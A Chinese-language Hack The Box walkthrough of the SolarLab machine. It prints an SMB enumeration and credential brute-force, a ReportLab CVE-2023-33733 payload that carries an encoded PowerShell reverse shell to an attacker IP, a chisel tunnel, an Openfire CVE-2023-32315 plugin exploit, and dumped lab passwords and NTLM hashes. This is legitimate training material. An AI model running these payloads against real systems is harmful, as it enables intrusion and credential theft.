HTB-SolarLab笔记

admin 2024年5月15日18:25:46评论143 views1字数 4589阅读15分17秒阅读模式

HTB-SolarLab笔记

扫描靶机

nmap -p 1-65535 -T4 -A -v 10.10.11.16

HTB-SolarLab笔记

有80端口跟smb日常端口,先试试空密码登录

HTB-SolarLab笔记

看来可以空密码登录,有两个共享文件夹,使用smbmap看看属性

HTB-SolarLab笔记

得出了Documents跟IPC$有只读属性,先看Documents

smbclient \\10.10.11.16\Documents -N

HTB-SolarLab笔记

底下有几个文件夹还有word文档execl表格,下载下来吧,然后打开

HTB-SolarLab笔记

从里面的信息可以得到,用户名还有密码,将这些用户名收集起来,按照以前的惯例格式

Alexander.knightAlexander.kKAlexanderblake.byteblake.bAlexanderKClaudiaSblakeb

收集完看下网页

HTB-SolarLab笔记

80网站没什么东西可以看,然后看看6791端口

HTB-SolarLab笔记

需要登录,但是没有用户跟密码,那就用上面收集到的,进行fuzz

wfuzz -c -z file,users.txt -z file,pass.txt --hw 0 -d "username=FUZZ&password=FUZ2Z" -H "Content-Type: application/x-www-form-urlencoded" -u http://report.solarlab.htb:6791/login

HTB-SolarLab笔记

跑出来了一个302状态的,是blakeb - ThisCanB3typedeasily1@,直接登录试试

HTB-SolarLab笔记

HTB-SolarLab笔记

成功登录了,有四个选项,里面的每一个都有自己的特点

HTB-SolarLab笔记

HTB-SolarLab笔记

HTB-SolarLab笔记

HTB-SolarLab笔记

第三个跟第四个其中里面的表单是可以放大缩小的,猜测可以进行测试,在网上可以找到Reportlab的一个漏洞,就是利用html解析功能,利用系统的python库,可以参考这篇文章

https://ethicalhacking.uk/cve-2023-33733-rce-in-reportlabs-html-parser/#gsc.tab=0

首先是创建一个evil的html,里面加入payload,将html的代码复制到表单里面,生成的时候会利用改系统python库进行生成,从而执行payload,改evil html就在网站的下方

<para>    <font color="[ [ getattr(pow,Attacker('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAwACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=') for Attacker in [orgTypeFun('Attacker', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">    exploit    </font></para>

HTB-SolarLab笔记

但是会限制字数,所以需要使用burpsuite进行抓包,将其补全

HTB-SolarLab笔记

本地进行监听,成功的反弹shell

HTB-SolarLab笔记

成功的拿到了user flag

HTB-SolarLab笔记

搜一下目录的文件夹,可以得到一个db文件

HTB-SolarLab笔记

将其下载下来打开看看

HTB-SolarLab笔记

BlakeB  BlakeBClaudiaS  ClaudiaSAlexanderK  ClaudiaSblakeb  ThisCanB3typedeasily1@claudias  007poiuytrewqalexanderk  HotP!fireguard

得到了一份用户名跟表格,先留着,查看一下后台端口

HTB-SolarLab笔记

看到了有9090跟9091端口,将其代理到本地使用chisel

.chisel-1-7-6.exe client 10.10.14.13:1132 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

HTB-SolarLab笔记

成功代理出来,打开浏览器进入9090端口

HTB-SolarLab笔记

这是openfire的cms,下面就是版本号4.7.4,在网上可以找到关于这个版本的exploit

https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce

https://github.com/miko550/CVE-2023-32315

这是身份绕过exp,里面包含命令运行模块,但是这个需要将模块上传到cms里面,前提是新建一个管理员账号

HTB-SolarLab笔记

新建成功后直接登录

HTB-SolarLab笔记

成功的登录进去了,然后进入到插件选项,将evil的jar包上传

HTB-SolarLab笔记

上传成功后根据GitHub那个给的提示,进入到所需目录

HTB-SolarLab笔记

这时候输入刚刚jar包的密码123

HTB-SolarLab笔记

然后选择system command

HTB-SolarLab笔记

HTB-SolarLab笔记

成功拿到openfire用户,接下来搜索一下目录,在openfire系统的源文件目录C:Program FilesOpenfireembedded-db里面可以找到openfire,script,将其下载下来

HTB-SolarLab笔记

这是openfire的数据库脚本命令,这脚本专为 HSQLDB 数据库编写

HTB-SolarLab笔记

在这里可以找到admin的哈希,但是需要破解

HTB-SolarLab笔记

INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')

这是需要这个openfire的解密工具

https://github.com/c0rdis/openfire_decrypt

java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn

HTB-SolarLab笔记

成功的拿到了密码,直接使用RunCs工具进行登录(我用cs直接),成功拿到admin

HTB-SolarLab笔记

HTB-SolarLab笔记

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::

原文始发于微信公众号(Jiyou too beautiful):HTB-SolarLab笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日18:25:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-SolarLab笔记https://cn-sec.com/archives/2743451.html

发表评论

匿名网友 填写信息